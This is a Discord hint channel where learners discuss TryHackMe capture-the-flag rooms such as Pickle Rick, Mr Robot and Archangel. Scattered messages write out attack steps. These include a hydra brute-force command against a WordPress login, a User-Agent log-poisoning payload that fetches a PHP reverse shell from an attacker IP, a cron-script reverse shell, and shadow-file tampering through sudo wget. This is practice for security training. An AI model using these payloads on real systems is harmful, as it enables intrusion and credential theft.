#room-hints

1 messages ยท Page 10 of 1

lucid junco
#

Ok, ignore the js just now.

#

Have a look elsewhere

sly basin
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #2 - 2044)

late topaz
#

Hey0 good morning - working on this room https://tryhackme.com/room/ultratech1 - anyone have a hint on task 3? I think we gotta use /ping portion of the API to discover something? Idk....the question in task 3 makes it sound like discovring the DB isn't too difficult, ran basic sqlmap and nothing, enumerated what I could and i'm super stuck. I dont know very much about API's D:

tropic garden
#

Have you tried inserting commands in the IP address field ?

light pendant
#

I need a hint for Pickle Rick room, I'm in despair

#

I've found ||username: R1ckRul3s|| and ||/login.php||

#

I've tried ||bruteforcing with the username and 10k passwords/digit combinations, fuzzed for SQLi, tried playing around with form values and headers|| but got nothing

mint pelican
#

Maybe doing dir enum might help you

light pendant
#

I've found ||clue.txt|| but I guess it should be found after getting shell as www-data lol

#

I think I've ran out of dictionaries for dir enum

#

several directory dictionaries, all 1-4 letter combinations, all 3-5 digit combinations, even names dictionary

sterile cypress
#

Hello, who can help me with this problem?

light pendant
#

oh wait, it's just incorrect answer, I thought it's some bad request popup lol

lucid junco
light pendant
late topaz
#

halp halp halp, I'm doing https://tryhackme.com/room/stuxctf - the only hint is diffie hellman and a page inspection that gives me digits. I'm no mathamatician - I've tried looking up diffie hellman calculators and I'm just not sure what i'm doing. Anyone care to point to me to a good resource or explain how to do this math problem?

late topaz
#

oh man, I got my colleague who's a physics major in on this and he cant figure it out either >.<

light pendant
#

i wonder what c is

light pendant
#

i guess not. I've found that ||user gwendoline can sudo (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt|| but im not sure what to do with it

ripe hedge
#

There's a site that can help

#

Especially with bins

warm arrow
#

so, i'm doing mrrobot right now executing || hydra -l Elliot -P fsocity.dic 10.10.17.3 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the" -t 30 || been waiting for 30 minutes now. anything i can do to speed up the ||bruteforce||?

light pendant
#

sure

#

i know it can be exploited if ran with root privileges, but seems like I can't do it there

languid plover
#

what did you tried to do?

light pendant
#

since I cannot run vi as root, I don't really know what to try

#

i can start shell as another user, but not root

languid plover
light pendant
#

I know, but what does it change?

languid plover
light pendant
#

but how can I increase my privileges if I still cannot open it as root?

#

I can open it as anyone but root

languid plover
#

you can open it as root

light pendant
languid plover
#

you have to find a way to do it

#

check the sudo version and search on google a way to do it ;)

light pendant
#

i can't believe the exploit is so simple, lol

#

thanks @languid plover !

languid plover
#

๐Ÿ‘

warm arrow
#

Ahhhhh....i'm waiting and waiting but the mrrobot ||hydra brute force|| just won't complete

light pendant
light pendant
#

because I've found ||green_arrow.ticket and the token RTy8yhBQdscX looks just like an identifier on youtube, but youtube.com/watch?v=RTy8yhBQdscX also says video no longer available)||

mint pelican
#

Maybe it is an encoded string and not an identifier

light pendant
#

tried it, decoding it as base64 doesnt give anything readable

mint pelican
#

Hint will be, it is not base64 encoded. Try others, i usually used the tool cyberchef, served me well

light pendant
#

thanks! got it, definitely bookmarking cyberchef

light pendant
#

finished the room, super fun one!

lucid junco
#

What do you need heko with?

light pendant
#

heko โค๏ธ

limber linden
#

Hi, I'm stuck at the Jenkins room; once i've had my rev shell, the second one is not working. The ps commands in the Jenkins application dont compile/work anymore. It only works once.

tropic garden
limber linden
tropic garden
limber linden
tropic garden
tropic garden
upbeat relic
#

I need help with advent of cyber 2022 questions please

vast lance
upbeat relic
#

Thank you

warm arrow
wraith notch
#

Hey guys, Just going over some old rooms and cant get a meterpreter shell on ToolsRus, keep getting failed aborted due to failure : unable to automatically select target.

#

ignore me, sorted now

worldly moss
#

Expose challenge
I started with nmap, 3 open ports. Now I'm using hydra to find the username and pass, em i at the right path ?

ivory meadow
worldly moss
ivory meadow
#

Sorry.

rugged talon
#

@stuck fractal when i google it it find me your room in google

#

i mean the interface name is wlan0 right?

#

it doesnt change

#

i know the answer is wlan0mon i dont understand why

stuck fractal
rugged talon
#

with airmon

#

sudo airmon-ng start wlan0

#

i dont know whats iw tbh

gray adder
#

@stuck fractal Hi
In Room Snapped Phish-ing Line id task 7 has answer? According to question "When was the SSL certificate the phishing domain used to host the phishing kit archive first logged? (format: YYYY-MM-DD)" I check it in whois website https://www.whois.com/whois/kennaroads.buzz but still wrong

stuck fractal
gray adder
#

Sorry my problem

white salmon
#

Network Services 2 > Exploiting NFS > bash file

I have correctly followed all the steps, but the problem is when I execute the bash file, nothing happens. Has anyone encountered the same issue?

white salmon
white salmon
#

can someone give me a hint for the ctf pickle rick

#

I didn't get the first ingredient

lucid junco
white salmon
#

kinda yeah

#

I found the usernam inspecting the site web

#

I try using hydra but ssh is not using password

#

then I found assets directory

lucid junco
#

The password can be enumerated.

#

You may actually have already found it and not even paid attention.

white salmon
#

and I'm trying to path traversal to /home/user/.ssh/id_rsa but I can't

#

what do you mean enumerated

lucid junco
#

Have you found a common webpage that almost every ctf you've done.

white salmon
#

I tried index.php but I didn't do that many ctf to know the common place to look for

#

I could use a hint

white salmon
#

ssh-hostkey ?

lucid junco
#

you don't need to use ssh

#

at all

white salmon
#

ok ok

white salmon
lucid junco
white salmon
#

really

#

ok ok

white salmon
#

I might be too young to understand those reference sorry

lucid junco
#

B99 isn't that old ๐Ÿ˜ญ @trim haven

white salmon
#

B99 ?

#

it might be

lucid junco
white salmon
#

I did

lucid junco
#

What did you get?

trim haven
white salmon
#

19

trim haven
#

I know every single line and scene from B99 lmao

#

I'm 20 ๐Ÿ˜ญ

white salmon
#

no idea what it is

#

I'm from europe

#

maybe it's famous in usa but not europe idk

trim haven
#

Same ^^

It's a Comedy TV Series

white salmon
#

I'm not a comedy fan

#

friends and other stuff doesn't appeal me

#

I'm more a doctor who fan

#

anyway for the dirbuster should I do it again and let if finish the worlists

#

and can I do 2>/dev/null to get rid of the errors ?

lucid junco
#

There is a web page that is common in ctf to have some information.

white salmon
#

ok ok

#

I found robots.txt

lucid junco
#

๐Ÿ˜„

#

That's what I was hinting on.

#

lol

white salmon
#

what am I supposed to do with that

lucid junco
#

What does it look like?

white salmon
#

no way

#

that's crazy

lucid junco
#

๐Ÿ˜„

white salmon
#

but wait

#

no ssh

#

how do I use this

lucid junco
#

Have you enumerated another login web page?

white salmon
#

it's still going

#

but I'll look for it

#

thanks

lucid junco
white salmon
#

alright

#

those

#

or should I look online for even bigger ones ?

#

I'm already using medium which is the biggest one I seem to have

lucid junco
#

Don't you have seclists?

white salmon
#

I do yeah

#

let me look for a big one

#

thanks

#

there is so many but I'm trying with this one we'll see

directory-list-2.3-big.txt
lucid junco
#

Gooood idea.

white salmon
#

I'm using the option -t250 but idk how much can I put

#

is it the max ?

#

or can I push it even more so it's faster

lucid junco
#

Don't worry about speed.

white salmon
#

alright

#

I'll wait

#

it's long

#

taking his sweet time

lucid junco
#

It is ๐Ÿ˜

white salmon
#

I still have nothing popping up

#

I tried going for /admin or /login but nothing

lucid junco
white salmon
#

alright

#

thanks

#

broooo

#

I looked for portal I swear

#

no way I needed .php

#

so when I'm doing gobuster without the option -x it won't show me directory with .* only the ones with words

lucid junco
#

with -x it will just search for the list with .php

white salmon
#

but if I didn't use -x and keep and searching with the list for ever will it found portal.php or no

lucid junco
#

if you used -x 'php, html, txt'

It will only look for those things.

white salmon
#

ok ok

white salmon
#

cause I was running it for 20 mins nothing found

#

and just by putting .php it took 2 sec

#

so I was curious

#

maybe by default it doesn't look for file and only plain words

#

@lucid junco

#

I might have cheat idk

#

I did the room privilege escalation on linux so I'm familiarize with certain stuff and the one I remembered very well is using base64 to see files

lucid junco
#

That's not cheating.

white salmon
#

so I couldn't do cat /home/rick/'second ingredients' so I used base64 to see it

#

yeah but maybe that's not how I was supposed to do it yk

lucid junco
#

Yeah, but on the hand, you've taken something you've learned, and used it to gain something else.

white salmon
#

yeah but it was luck

#

I didn't check if I had permission to use base64

#

I just tried and got lucky

lucid junco
#

Do you have a shell, or are you still using the webpage?

white salmon
#

still on portal.php

#

I was thinking looking in passwd and shadow to get rick password

#

but yeah that's the thing I feel like I skipped steps

#

like I saw there is a cookie named phpsession but couldn't decode it

#

so I didn't look more in it

#

I got a shell

lucid junco
#

๐Ÿ˜„

white salmon
#

but I'm still in the same situation lmao

#

do I have to look more into the phpsession cookie ?

lucid junco
#

not really.

white salmon
#

alright

#

so no burp ?

lucid junco
#

Nah.

#

Burp isn't needed.

white salmon
#

thanks

#

can I get a hint on where to look for the last one

#

I was thinking getting root

lucid junco
#

It's going to be in root, so I'd look for way to PrivEsc, or find out what your current shell can run.

There's a command that does that.

white salmon
#

lmao nice

#

I'm not completely lost that's good

#

let's gooooo

#

why does it look like that tho ?

#

invisible shell

#

should I do import python

lucid junco
#

If you want, not essntial for this CTF though

white salmon
#

yeah I got the 3rd

#

it feel so good I didn't had to look online for help

#

you're the best thanks a lot @lucid junco

green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2121)

lucid junco
white salmon
#

by looking at the task I feel like they both are doing the same stuff

lucid junco
#

One is created by THM, one is created by a community member.

shell shale
#

https://tryhackme.com/r/room/crackthehash
Task 1, question 4:
I can't find the $2y$ hash on hashcat's website mentioned in the hint. All I could find are 4 hashes that start with $2a$ and one hash starting with $2b$. Am I missing something?

#

Right now, I'm brute-forcing hash 28400 - (bcrypt(sha512($pass)) / bcryptsha512) with a lowercase four-letter mask, but it really takes a long time. 63% done, and still nothing. My guess is it's not the right hash. Should I just brute-force the hash types I mentioned as well? :/

shell shale
leaden abyss
lucid junco
shell shale
#

Found it with a filtered wordlist, thank you both

green minnowBOT
#

Gave 1 Rep to .scrubz. (current: #1 - 2123)

#

You're still on cooldown

#

You're still on cooldown

ancient saffron
#

Hi, I'm currently doing Wonderland box as Alice user, and I have enumerated enough without finding proper way to make horizontal privs escalation. Actually I got 2 options, but I don"t know if it's just rabbit holes or real way of granting me another access :

  • I can run a python script as another user, via sudo but I don't know how am I supposed to hijack this, I can't really tamper the script or the script path, it's hardcoded in the sudoers file
  • I can exploit a capability but the gtfobins command doesn't work (permission denied) or I just get Alice shell again

Any hints ? Am I right by trying these two options ?

ancient saffron
lucid junco
ancient saffron
#

the script itself doesn't do anything crazy, just printing 10 random lines

#

yes

#

I read the code

lucid junco
#

The same 10 random lines?

ancient saffron
#

not really, it changes at each new running time

lucid junco
#

Maybe now you should try and find out what the script is doing ๐Ÿ™‚

ancient saffron
#

I think I already know, it just uses the "random" function to print 10 lines thanks to a for loop but..why ? ๐Ÿ˜…

lucid junco
ancient saffron
#

yes, but I don't have any write permission to modify it, the variable used is set in it, I can't add a command line to be printed or interpreted by python at the same way I guess

lucid junco
lucid junco
ancient saffron
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2124)

shell shale
#

Crack the hash again, task 2:
I tried modes 150 and 160 (both HMAC-SHA1 like the hint says, but each time the key is different - password or salt) with 12-character words from rockyou.txt, and got nothing.
hashcat -m 160 -a 3 e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme words.txt
What did I miss this time?..

shell shale
gilded karma
#

Hello everyone, I am doing the Agentsudo ctf and I am stuck in the step where I am supposed to find the other agent's name, that starts with J, I accidentally spoiled myself and I know the name is j***s, but I have no idea how I could find it

gilded karma
#

SOLVED, steghide..

static helm
lucid junco
static helm
#

should open another window right?

lucid junco
#

A pop up yeah

static helm
lucid junco
static helm
#

i dont see anything about status

lucid junco
#

Account is ....

static helm
#

yep i found it now im stragaling to tipe it

#

thanks

shell shale
chrome helm
#

Hi!
vulnnetinternal
I need a little hint on how to find out the username in order to use the passwords me have already found.
I'm stuck at the stage of getting access to the machine itself:
What is the user flag? (user.txt)
||Is the username being searched in the database or is it being Brute-force?||

tropic garden
#

I don't recall having any need for brute forcing.

chrome helm
#

Yeah, that's what I'm doing.
I guess I didn't get everything out of it.
I found a shared folder, but the password I found is not suitable to see what's inside.

#

I will look for other passwords, now I have only two of them in my hands.

tropic garden
tribal imp
#

Hi, I am little stuck. In room Relevant I have acces to samba share with read/write acces. I can acces to samba share files via http. My idea is upload revers shell, but I dont know what format to use. Any idea?

tribal imp
#

web framework asp .net and google is solution ๐Ÿ™‚

tribal imp
#

Another question, If you use brute force with rockyou.txt, how long do you keep the task running before you decide it is pointless? For CTF, not for real world pentest of course.

ripe hedge
unborn moon
ripe hedge
unborn moon
ripe hedge
#

Attackbox is so slow though

unborn moon
ripe hedge
#

I mean for cracking hashes

chrome helm
#

Hi!
Advent of Cyber 2022
Task 23[Day 18] Sigma Lumberjack Lenny Learns New Rules
I can't figure out what kind of mistake is this?

left thunder
chrome helm
#

Thanks, @left thunderI rebooted the machine.
It helped.๐Ÿคฆโ€โ™‚๏ธ

green minnowBOT
#

Gave +1 Rep to @left thunder (current: #3 - 1815)

sand pumice
#

Not asking for help, but wanted to share something I encountered today. I'm going through the Linux PrivEsc room, and Task 9 involves crontabs. The challenge suggests popping a reverse shell by exploiting the way the cron job is set up. Going to spoiler this just in case: ||There's a cron job called backup.sh which is stored in karen's home directory, we have write access to it. It runs every minute. All we need to do is replace the contents of that script with the line for our reverse shell, then open up a listener on the attacking machine, and once the cron job spins up, boom, reverse shell. I did this, but nothing happened... I started looking into everything, and what I found eventually was that the shell script did not even have execute permissions. Even though there was a cron job set up, it was never running because the script can't fire anyway. I was able to chmod to add x perms, and then boom, reverse shell.||

ripe hedge
#

sounds about right.

tribal imp
#

@ripe hedge thank you ๐Ÿ™‚

green minnowBOT
#

Gave +1 Rep to @ripe hedge (current: #11 - 565)

steep raven
#

Hello!
Can somebody point me to the right direction with MrRobot CTF? Please DM me if you can.
I don't want to use walkthrough.

#

Nvm, I found it, It was just a typo, lol

flat peak
#

For Pickle Rick, is the apparently encrypted folders inside the var/log/journal directory used for anything?

lucid junco
#

Bonus points if you get in them though

flat peak
#

Crap, I think i broke the machine, I grep'd for ||ingredient|| over my reverse shell and now the terminal is not responding to my commands. Is there a way to cancel the grep? Or should I just wait for it to complete. I can't seem to access the login to attempt to re-establish the reverse shell

#

nvm

#

can I have a hint on privesc on pickle rick?

#

I know the kernal version etc. but I can't seem to find anything useful on exploitDB

lucid junco
#

Do you have a shell?

flat peak
#

Reverse shell under www-data

#

I tried to steal the .ssh key but it's access denied. I checked crontabs to see if there were any scripts, apache to read the shadow file and see if there was a hash

lucid junco
#

Is there a way to see what www-data can run as sudo?

flat peak
#

Doesn't look like much!

lucid junco
#

It does't no..

#

But one command in there sticks out.

flat peak
#

although I was able to use sudo cat

lucid junco
#

Do you know why?

flat peak
#

is it because I can run all commands?

lucid junco
#

(ALL) NOPASSWD: ALL

flat peak
#

๐Ÿคฆ

#

I tried sudo in the past, like sudo -s, it would say something like "unable to sudo"

lucid junco
#

In Picklerick?

flat peak
#

and su root prompted me for a password I couldn't enter

#

Yeah

lucid junco
#

Ah, yeah, you're changing to root, so it would ask for authentication.

flat peak
#

spoiler territory but ||sudo su root|| worked with no password

lucid junco
#

Not spoiler, that's working as intended.

#

Thanks to www-data ||being able to run all sudo commands without a password||

flat peak
#

thanks for the hint!

flat peak
#

On the subject of that|| sudo -l screen||, I thought|| "you can run all, no passwd"|| meant "you can run all commands that don't require a password" i.e. guest level access, esp since|| sudo -s ||(the classic "give me root" command) was giving me an error so I thought I wasn't in sudoers or something. (Don't tell Santa!)

serene badger
#

am i missing something or doing something wrong? dreaming room

ivory meadow
#

Look carefully at the "(death)" part

serene badger
#

thanks, took me a bit to google the syntax and how to use it, but that did it ๐Ÿ™‚

#

+rep @ivory meadow

green minnowBOT
#

Gave +1 Rep to @ivory meadow (current: #26 - 298)

pulsar crane
#

Hi, I'm doing the TryHack3M: Bricks Heist room and believe I've found the wallet inside ||/lib/NetworkManager/inet.conf|| and after ||decoding|| it via ||hex and 2x base64|| i get an ||bc1|| wallet, but that doesn't seem to exist. Anyone who might be able to push me towards the right track?

Edit: Found a unethical solution but it did the trick: ||Abusing tryhackme's "answer format", I figured out that its length is 42 and used that - it worked! Time to get a bit more familiar with blockchain/crypto wallets I guess||

scenic shuttle
astral smelt
ancient saffron
#

Room : Bypass

Hi, I tried getting the second flag by changing|| user-agent|| but I sill get "invalid attempt" message :

||I did it with curl (-A option & -H option) = KO
I did it with Burpsuite = KO
I did it with Python = KO
I rebooted the VM = KO
I tried different version of the User-Agent (with quotes, without them) = KO||

Any hint ? ||my GET request seems ok though||

I give it a try here in addition to the dedicated channel

astral smelt
#

Oh my bad you already posted there

sullen kelp
#

You need to make a request on port 80, specifying the user agent as "I am Steve Friend".

ancient saffron
#

That's what I actually did throught several ways, none worked at time

ancient saffron
green minnowBOT
#

Gave +1 Rep to @sullen kelp (current: #2059 - 1)

snow zinc
pulsar crane
#

Feel free to send me a dm, not sure if itโ€™s allowed yet due to Blackouts post

trim haven
snow zinc
trim haven
snow zinc
#

Thx, missed it

dull yew
half ermine
#

Hello Everybody , good afternoon!

I need some help with this room Network services. Enumerating Telnet . I'm stuck now for 3 days. I have try Nmap and found port 8012. I found something about skiddy but cant find it again. I tried with enum4linux and smbclient but wont work. any help ๐Ÿ†˜ thank you !

dull yew
#

+rep @pulsar crane

green minnowBOT
#

Gave +1 Rep to @pulsar crane (current: #831 - 4)

half ermine
stone orchid
half ermine
#

Thanks for the hint. let me give that a try.

half ermine
stone orchid
green minnowBOT
#

Gave 1 Rep to aurumdev (current: #707 - 5)

stone orchid
#

task 8 what point?

#

anyway if you read the task it says that the login page is :"http://MACHINE_IP/login-get/index.php"

crimson python
green minnowBOT
#

Gave +1 Rep to @stone orchid (current: #1367 - 2)

sand pumice
#

Greetings! I decided to start poking around some of the CTFs, and I settled on Expose as a first one. It presents a really interesting but somewhat simple challenge. From the get go, we're just given an IP address, and the name of two files to grab (a user flag and a root flag). From what I've gathered, this is a pretty usual starting point for CTFs.

I started doing some enumeration on the system, and found the following: Via an nmap -sS IP_ADDRESS scan, I was able to identify three open ports: 21 (ftp), 22 (ssh), and 53 (dns / domain). I was able to grab the versions of each of the services running on them as well. However, I hit a wall I didn't really think about. I don't even know where to start with trying to brute force a login if I have no password. I found a usernames wordlist, and am currently running a Hydra scan on the ssh to see if I can find anything, but if I were to let this scan continue to run, it would take a very long time.

So what I'm looking for is some hint as to how I can work on enumerating the users on a given host. Is there something I can flood with attempts from the wordlist that would respond with something akin to "no such user" if the username doesn't exist, and "wrong password" for a correct username? If I use hydra and just give it a single password wordlist, my understanding is that it'll just return no matches. (I tried this, and that's what happened)

Am I forgetting something really basic about how to identify users on a system without actually having access to that system?

#

Certainly if I had access to the system I could probably find other users, but without any access I'm feeling a bit stumped. Wanted to reach out here rather than just looking up the answer, and in the meantime I'm continuing to search / research

lucid junco
sand pumice
#

I haven't probed deeper, but I absolutely can

#

I just checked -sS to start with. I suspected that might be too limited, but once those ports showed up I felt like "okay, here's something to work with", until it occurred to me that I might not have enough to work with.

stone orchid
#

thanks @pulsar crane

green minnowBOT
#

Gave +1 Rep to @pulsar crane (current: #619 - 6)

sand pumice
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2173)

median bison
#

i was working on the Windows User Account Forensics and have gotten stumped on the following question: What is the value of the "bootKey" variable? I must be overlooking it because i got the previous and next questions correct... What does the value look like? or how is it presented in the output? or is there another command I forgot to complete?

sand pumice
# lucid junco You should probe deeper.

Just an an update, because it's been sort of slow progress: ||I ran a scan on all ports, and found two additional ones! 1337 which is a web server, but seems to have basically nothing on it, and 1883 which is a mqtt mosquitto server. Been digging into the mosquitto route so far: can I find a way to subscribe to it to retrieve whatever messages are being sent from it? Yes I can! But I don't understand what good these messages could do me yet. My thought here is maybe I can find a way to publish a message to it and get it to send a message to something that will report back something useful like credentials or whatnot||

fossil cave
#

I am in the uploadvulns room, I make a revshell from revshells.com and upload it to the server while I am listening

#

But nothing comes back

#

Any ideas?

#

Nothing appears to be in the resources directory, where it is supposed to be

#

Whatever I upload, nothing goes there

tropic garden
fossil cave
#

How do I execute a .sh file through the URL once it is uploaded

#

?

#

When I navigate to it through the URL, it just downloads

#

How do I execute payload(1)?

#

In the taks for a php webshell it says just to visit it

#

This is a reverse shell

#

How do I activate it

#

?

tropic garden
fossil cave
#

That is the default answer

#

The default solution

#

However it is said, use either a webshell or a rev shell

#

I decided to use a revshell

#

Should I use a PHP reverse shell then?

#

Well, I got in

#

But I did not get in with a rev shell with a .sh extension

#

Got in with a pentestmonkey php revshell

fossil cave
green minnowBOT
#

Gave +1 Rep to @tropic garden (current: #13 - 514)

tropic garden
# fossil cave However it is said, use either a webshell or a rev shell

Should you choose to run a webshell, there is one somewhere in kali. Can't remember exactly if it in /usr/share/webshells but there should be one. You can then put in a reverse shell payload using that webshell, but that will take another step and it might not work in all cases depending on the web application you are dealing with.

hushed moon
#

Any help to get TCP flag from borderlands room?

winged jungle
#

hlo

stone orchid
flat peak
#

How do I stop and start a service from the meterpreter command line? (Steel mountain)

#

nevermind, I was able to use shell to switch to what I assume is a cmd shell

chrome helm
#

Hi.๐Ÿ‘‹
I'm at the last step - room - "vulnnetinternal"
||I can't figure out how to get RCE when I've already got to the admin panel - TeamCity.||

tropic garden
#

Suggest that you do a Google search for an exploit for it.

chrome helm
#

Yes, they are, but they do what I have already received. I need to find out how to upload a shell there or get an RCE.
||exploits allow you to log in without authentication, but they don't give you a shell, and I don't understand how to upload a file for a reverse shell.||
||I even found a metasploit, but it doesn't work properly.
that's why I decided to ask how you managed to exploit the admin panel.||

chrome helm
tropic garden
chrome helm
tropic garden
untold lodge
#

Hi all. Newbie to TryHackMe. Seriously stuck on walkinganapllication Task 3 Question 3. I have no clue how to find this 'directory' in order to get this flag.txt file. I've exhausted the discord for others looking for help but I'm no further forward. Any help would be very appreciated โค๏ธ

lucid junco
untold lodge
#

Hi @lucid junco I do not, no.

lucid junco
untold lodge
green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2197)

untold lodge
#

@lucid junco I'll need a bit of hand holding here. I now have a brief understanding of FDB after researching. I don't know how I apply this to this question though... I have tried altering the URL manually within my browser with no luck. My last remaining braincell is slowly burning up ๐Ÿ˜‚ Wondering if I need to use another room prior to this one? I came from intro to cyber security straight to Jr pen tester.

craggy wyvern
#

hello everyone is the free rooms, level easy without privilage escalation?

tropic garden
#

Don't forget to have fun while learning though.

craggy wyvern
#

Allright, I'm just not in privilage escaltion module yet

pastel talonBOT
#
Pong!
API Latency

115ms

Client Latency

543ms

drifting walrus
#

I'm doing the XSS room and at Task 7 the task is the following:
Go to the contact page and submit the following message <script>alert(document.cookie)</script>. Next, log in as the Receptionist. What is the name of the key from the displayed key-value pair?

I've logged in as the Receptionist but I don't understand what the second part is: "What is the name of the key from the displayed key-value pair?"

left thunder
drifting walrus
#

Found it, thanks @left thunder ๐Ÿ˜„

green minnowBOT
#

Gave +1 Rep to @left thunder (current: #3 - 1820)

drifting walrus
#

I was looking in the wrong section of some tool

coarse garnet
#

What this question means?


#

Netwrok services room

#

SMB enumeration task

#

last question

lucid junco
#

You need to enumerate the smb port and see which shares are on there that look suspicious

coarse garnet
#

How to find suspicious shares?



    Sharename       Type      Comment
    ---------       ----      -------
    netlogon        Disk      Network Logon Service
    profiles        Disk      Users profiles
    print$          Disk      Printer Drivers
    IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP            POLOSMB

[+] Attempting to map shares on 10.10.31.165
lucid junco
coarse garnet
#

netlogon?

#

correct ans is|| profiles||

#

๐Ÿฅฒ

vestal echo
#

@devout moss online ???

coarse garnet
#

on line

chrome helm
#

Hi!
Avengers Blog Task 6 - SQL Injection
I am confused by the question, the answer is obvious, you need to open the source code of the page and just specify the number of lines.
But it didn't fit.
I did not count the empty lines and counted only the filled ones, but also not correctly.
Probably a stupid question, but How do I count the lines correctly?)

chrome helm
#

I have a feeling that the source code is not displayed the right one after I managed to log in to "JarvisControlPanel".๐Ÿค”

karmic pivot
karmic pivot
lofty laurel
#

hey,
anyone here completed Midnight Linux. Actually i am having trouble to login from 4th user and root user i have password's of both of them but when i ssh it shows me permission denied for these users

lofty laurel
lucid junco
lofty laurel
#

but i have a free account and i can access this room how's that possible

lucid junco
#

Are you part of a school/business?

unborn moon
south delta
#

hello, on the room : https://tryhackme.com/r/room/archangel

i dont really get why it doesn't work, the only intel i got is that it works for my friend but he's using VPN
so, i'm at the "Get a shell" part and there is what i'm doing for LFI to RCE via file poisoning if i'm not wrong

curl : || curl "http://10.10.184.130/" -H "User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.10.154.10:8080/rev.php')) ?>" ||

i also got a python server running : python -m http.server 8080 and a netcat : nc -nvlp 9001

TryHackMe

Boot2root, Web exploitation, Privilege escalation, LFI

#

the problem is i dont manage to get my revshell on the target server if i'm not mistakin

tropic garden
south delta
#

yes, i tried with the one i showed AND an other method wich is exactly the one you said with burp and both doesnt work for me but work for my friends i dont get it lol it's frustrating

south delta
#

its ok i finnally got it with the same method as you

restive forge
#

Intro-to-Logs: Task5 Practical Activity: Log Management with logrotate.

I've created the nano file given "/var/log/websrv-02/rsyslog_sshd.log"

and executed the given command "sudo logrotate -f /etc/logrotate.d/98-websrv-02_sshd.conf"

only to receive "error: stat of /var/log/websrv-02/rsyslog_sshd.log failed: No such file or directory"

could use some in finding out what im doing wrong.

tropic garden
kind prawnBOT
finite spruce
#

https://tryhackme.com/r/room/lessonlearned

I tried every possible sql injection manually as well as using scripts, but I was not able to find any sqli, even read some writeups after getting frustrated and saw that they used the same payload which I was using and got the flag.

Is the room broken or I am missing on something ? Please guide me anyone who has solved the room .

ruby creek
fleet pike
tropic garden
tropic garden
#

Just did Atlas (https://tryhackme.com/r/room/atlas) and was wondering what enumeration should I have done to discover that the target is vulnerable to || PrintNightmare ||? I know it wasn't part of the task, but I tried WinPEAS and PrivescCheck (and even did manual enumeration), but didn't get any fruitful result.

I guess the curiosity here stems on how can I further improve my Windows enumeration skills / methodology.

TryHackMe

Hack the Atlas server in this beginner room covering Windows attack methodology!

chrome helm
tropic garden
chrome helm
#

I have to check the source code of this page, right?

chrome helm
#

I'm just looking at the code of this very page. That's why it's weird.

#

Everything is fine, I used another virtual machine and the code displayed is the one I need!
What was the reason for this on the last VM, I still did not understand!

#

@tropic gardenThanks for checking it out. At first I thought it was a bug on the box)

tropic garden
white salmon
#

Room is wgelctf. so wget has sudo withou pass. I've exfiltrated shadow file and tampered the salted pass of the user with a new one using mkpasswd -m sha-512 and then I pull back the tampered shadow. But then I can't ssh back for some reason?

nvm wget will prob append some GET headers... let me check.
Nope, not the case

chrome helm
#

Can someone please push me with the last question in the room - "TryHack3M: Bricks Heist"
Maybe I misunderstand him.
Is the answer inside the box or on external resources?

white salmon
#

external resources

chrome helm
#

Yes, I also had the idea of (APT) in the first place in my head...
I only have doubts, can these groups really be calculated by the wallet number???๐Ÿ˜…

tropic garden
tropic garden
chrome helm
#

I think that everything is anonymous and if it were so easy to figure it out, then the black market and the "dark-web" would not exist.
You type in the wallet address and it gives you who its owner is?๐Ÿ˜…

white salmon
tropic garden
# white salmon uh?!

Copy the line / record for root in /etc/shadow, replace the user name (root) with a new one (new root), replace the hashed password to one that you generated (as root user and group id is already set to 0).

white salmon
tropic garden
#

At the end of the day, it's still up to you what method you use.

white salmon
#

I would need to tamper the passwd file too with the new user, uh?

#

using your method

tropic garden
#

Yes. I won't get a chance to take a look at my notes until later.

chrome helm
#

To clarify, you used this resource to search -"||blockchair.com - blockchain.com||" or some other one?

white salmon
#

I haven't done that room yet my man

chrome helm
#

Ohhhhh, I got it, OK, I thought you passed it๐Ÿ˜„

tiny matrix
#

anyone completed Osris? the issue I have is my compiled service, is not working

#

I'll have to debug it on Windoze

lucid junco
#

Which service?

tiny matrix
lucid junco
tiny matrix
#

I create the windows service to impersonate one on the server

lucid junco
tiny matrix
#

as I can start and stop services

#

yes, similar to that service

#

it's just a .NET Windows Service c#

#

I'll have to fully debug it locally

#

I'm clearly on the right track... ๐Ÿ˜‚

tiny matrix
#

my code and that code, works if I do something simple like create a userid, but spawning nc64.exe - not happy.

tiny matrix
#

I need to debug locally it does not execute nc64.exe !

chrome helm
#

Hey, and which of you was able to answer the last question in the room - "TryHack3M: Bricks Heist"?
That the Internet research on this issue has not yielded results.

manic hemlock
#

I was solving TryHack3M: Bricks Heist and noticed xmlrpc.php file, I am trying XXE attack, my payloads don't any effect, am I on right path or going for rabbit hole?

lucid junco
#

Rabbit hole.

#

Possibly

manic hemlock
#

okayy!!

lucid junco
#

Do you have wappizer.

#

Probably spelt it wrong

#

Wappalyzer

manic hemlock
#

yes.. initially my idea was to use wpscan as I saw wp-* files, but when I used it, gave error that (SSL peer certificate or SSH remote key was not OK) so thought might be doing something wrong .. then saw xml file in page source ..

#

now searching if there is any solution for this error..

tropic garden
manic hemlock
green minnowBOT
#

Gave +1 Rep to @tropic garden (current: #13 - 561)

unreal lynx
#

Doing Gotta Catch'em All! ctf room. Im struggling to find the Water-Type Pokemon . Any hints?

lucid junco
unreal lynx
unreal lynx
# lucid junco Its encrypted;)

hm..i dont see anything in the ||page-source||. Should i do anything in the ||console|| to retrieve that? or anything to do with the ||array||?

lucid junco
unreal lynx
unreal lynx
lucid junco
unreal lynx
# lucid junco Yes

Let me guess..the water type must be ||squirtle|| as it was mentioned in that ||array.|| that's how i came it with it .

unreal lynx
lucid junco
unreal lynx
lucid junco
unreal lynx
# lucid junco Ssh

it was in the ||page-source|| i didnt think upto that way. thanks for helping!

green minnowBOT
#

Gave +1 Rep to @lucid junco (current: #1 - 2304)

unreal lynx
#

Now im doing the Madness ctf room . oh boi im not able to fix this ||png|| file . tried giving the correct ||IHDR chunk value|| but that doesnt seem to work.

tropic garden
tropic garden
unreal lynx
unreal lynx
